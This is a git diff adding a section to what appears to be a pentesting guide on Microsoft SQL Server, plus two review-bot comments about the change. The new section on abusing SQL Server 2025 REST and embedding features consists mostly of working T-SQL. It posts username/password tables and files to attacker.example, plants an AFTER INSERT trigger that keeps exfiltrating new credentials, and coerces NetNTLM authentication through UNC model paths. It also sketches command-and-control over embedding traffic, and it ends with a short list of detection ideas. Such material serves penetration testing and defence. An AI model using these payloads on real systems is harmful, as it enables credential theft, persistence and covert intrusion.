diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index 7a76af2b0a0..a2d388f28fc 100644 --- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md 
@@ -504,6 +504,133 @@ SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTE https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))-- ``` + +### SQL Server 2025 AI / REST abuse + +SQL Server 2025 adds **database-native outbound HTTPS** and **external embedding model** support, which creates new exfiltration, coercion, persistence, and C2 primitives. + +#### `sp_invoke_external_rest_endpoint` for HTTPS exfiltration + +Useful constraints before abusing it: + +- Disabled by default on **SQL Server 2025**. A user with **`ALTER SETTINGS`** (commonly `sysadmin` / `serveradmin`) must enable it: + +```sql +EXECUTE sp_configure 'external rest endpoint enabled', 1; +RECONFIGURE WITH OVERRIDE; +``` + +- The caller needs **`EXECUTE ANY EXTERNAL ENDPOINT`**. +- Requests must use **HTTPS/TLS** with a valid certificate chain. +- Sent/received payloads can reach **100 MB**, making chunked table dumps practical. + +Serialize rows with `FOR JSON AUTO` and send them directly from the SQL Server process: + +```sql +DECLARE @payload NVARCHAR(MAX); +SELECT @payload = ( + SELECT username, password + FROM dbo.app_users + FOR JSON AUTO +); +EXEC sp_invoke_external_rest_endpoint + @url = N'https://attacker.example/collect', + @method = 'POST', + @payload = @payload; +``` + +Because the network origin is the **database engine**, this is quieter than dropping a separate implant or calling PowerShell. 
+ +#### File exfiltration via `OPENROWSET` + REST endpoint + +If the SQL Server service account can read a file, combine `OPENROWSET(BULK ...)` with the REST primitive to exfiltrate it over HTTPS: + +```sql +DECLARE @payload NVARCHAR(MAX); +SELECT @payload = BulkColumn +FROM OPENROWSET(BULK N'C:\Windows\System32\drivers\etc\hosts', SINGLE_CLOB) AS x; +EXEC sp_invoke_external_rest_endpoint + @url = N'https://attacker.example/files?name=hosts.txt', + @method = 'POST', + @headers = N'{"Content-Type":"text/plain"}', + @payload = @payload; +``` + +#### Persistent row exfiltration with triggers + +Instead of repeatedly dumping a table, weaponize an `AFTER INSERT` trigger so new rows are posted automatically: + +```sql +CREATE TRIGGER tr_exfil_users ON dbo.app_users AFTER INSERT AS +DECLARE @payload NVARCHAR(MAX); +SELECT @payload = (SELECT username, password FROM inserted FOR JSON AUTO); +EXEC sp_invoke_external_rest_endpoint + @url = N'https://attacker.example/collect', + @method = 'POST', + @payload = @payload; +``` + +This is a **database-resident persistence** primitive for future credential or secret capture. + +#### `CREATE EXTERNAL MODEL` / `AI_GENERATE_EMBEDDINGS` + +`CREATE EXTERNAL MODEL` stores an embedding endpoint definition inside the database. `AI_GENERATE_EMBEDDINGS` then sends attacker-controlled strings to that endpoint and returns the JSON vector response. + +```sql +CREATE EXTERNAL MODEL attacker_model +WITH ( + LOCATION = N'https://attacker.example/v1/embeddings', + API_FORMAT = 'OpenAI', + MODEL_TYPE = EMBEDDINGS, + MODEL = N'mock-embedding-model' +); +SELECT AI_GENERATE_EMBEDDINGS(N'checkin' USE MODEL attacker_model); +``` + +Useful permission notes: + +- Creating/altering models requires **`CREATE EXTERNAL MODEL`** or **`ALTER ANY EXTERNAL MODEL`**. +- A principal needs **`EXECUTE`** on the external model to use it. +- `AI_GENERATE_EMBEDDINGS` also depends on **`external rest endpoint enabled`**. 
+ +#### NetNTLM coercion via ONNX Runtime UNC paths + +If ONNX external models are enabled, `LOCATION` and `LOCAL_RUNTIME_PATH` can point to a **UNC path**. When the model is invoked, SQL Server tries to access the attacker SMB share and authenticates before the runtime initialization fails. + +```sql +EXEC sp_configure 'show advanced options', 1; RECONFIGURE; +EXEC sp_configure 'external AI runtimes enabled', 1; RECONFIGURE; +ALTER DATABASE SCOPED CONFIGURATION SET PREVIEW_FEATURES = ON; +CREATE EXTERNAL MODEL onnx_unc_test +WITH ( + LOCATION = N'\\attacker\share', + LOCAL_RUNTIME_PATH = N'\\attacker\share', + API_FORMAT = 'ONNX Runtime', + MODEL_TYPE = EMBEDDINGS, + MODEL = 'test' +); +SELECT AI_GENERATE_EMBEDDINGS(N'test' USE MODEL onnx_unc_test); +``` + +This behaves like other coercion gadgets, but the trigger is an **AI model invocation** instead of `xp_dirtree`. + +#### C2 over embedding traffic + +An attacker-controlled HTTPS service can impersonate an **OpenAI-compatible embeddings endpoint**. A T-SQL loop (or an **UNSAFE CLR** assembly loaded from hex) can: + +- check in with `AI_GENERATE_EMBEDDINGS(N'checkin' USE MODEL )` +- parse tasking with `OPENJSON` +- execute OS commands with `xp_cmdshell` **or** directly via CLR / `CreateProcessW` +- send command output back in another embedding request + +This turns normal-looking embedding traffic into a **database-native C2 transport**. + +#### Detection ideas + +- Query **`sys.external_models`** and alert on `CREATE/ALTER/DROP EXTERNAL MODEL`. +- Monitor enablement of **`external rest endpoint enabled`** and **`external AI runtimes enabled`**. +- If you use SQL Audit / XEvents, capture the SQL text for these statements and review **`external_rest_endpoint_summary`** and **`ai_generate_embeddings_summary`** events. + ### **RCE/Read files executing scripts (Python and R)** MSSQL could allow you to execute **scripts in Python and/or R**. 
These code will be executed by a **different user** than the one using **xp_cmdshell** to execute commands. @@ -781,6 +908,11 @@ You probably will be able to **escalate to Administrator** following one of thes - [HTB: DarkZero - linked-server credential mapping to cross-forest RCE](https://0xdf.gitlab.io/2026/04/04/htb-darkzero.html) - [HTB: Signed - MSSQL coercion to silver ticket sysadmin](https://0xdf.gitlab.io/2026/02/07/htb-signed.html) - [Microsoft Learn - sp_helplinkedsrvlogin (Transact-SQL)](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-helplinkedsrvlogin-transact-sql) +- [SpecterOps - Oops, I Weaponized the Database: Abusing AI Features in SQL Server 2025](https://specterops.io/blog/2026/06/10/oops-i-weaponized-the-database-abusing-ai-features-in-mssql-2025) +- [gershsec/mssql2025-poc](https://github.com/gershsec/mssql2025-poc) +- [Microsoft Learn - sp_invoke_external_rest_endpoint (Transact-SQL)](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-invoke-external-rest-endpoint-transact-sql?view=sql-server-ver17) +- [Microsoft Learn - CREATE EXTERNAL MODEL (Transact-SQL)](https://learn.microsoft.com/en-us/sql/t-sql/statements/create-external-model-transact-sql?view=sql-server-ver17) +- [Microsoft Learn - AI_GENERATE_EMBEDDINGS (Transact-SQL)](https://learn.microsoft.com/en-us/sql/t-sql/functions/ai-generate-embeddings-transact-sql?view=sql-server-ver17) - [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users) - [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/) - [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
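Review bot: In the "C2 over embedding traffic" list of the first hunk (`@@ -504,6 +504,133 @@`), the check-in bullet reads `AI_GENERATE_EMBEDDINGS(N'checkin' USE MODEL )` with no model name, so the statement is incomplete and does not match the earlier `USE MODEL attacker_model` example. A placeholder was probably lost in rendering; name the model explicitly, for instance by reusing `attacker_model`. The "Detection ideas" list also has no item for the `AFTER INSERT` trigger persistence described earlier in the same hunk. Consider adding a check of `sys.triggers` / `sys.sql_modules` for definitions that reference `sp_invoke_external_rest_endpoint`, plus a review of which principals hold `EXECUTE ANY EXTERNAL ENDPOINT`. Finally, the ONNX section's prose says only "If ONNX external models are enabled" while its code also sets `PREVIEW_FEATURES = ON`; state that prerequisite in the text so the conditions match the example.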
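Review bot: In the references hunk (`@@ -781,6 +908,11 @@`), the three added Microsoft Learn links carry `?view=sql-server-ver17` while the existing `sp_helplinkedsrvlogin` entry just above them has no view parameter. Either drop the parameter for consistency, or keep it deliberately because these features are SQL Server 2025-only. None of the five new entries is linked from the new section text, so it would also help to point the 100 MB payload limit and the permission notes at the specific Microsoft Learn page each comes from.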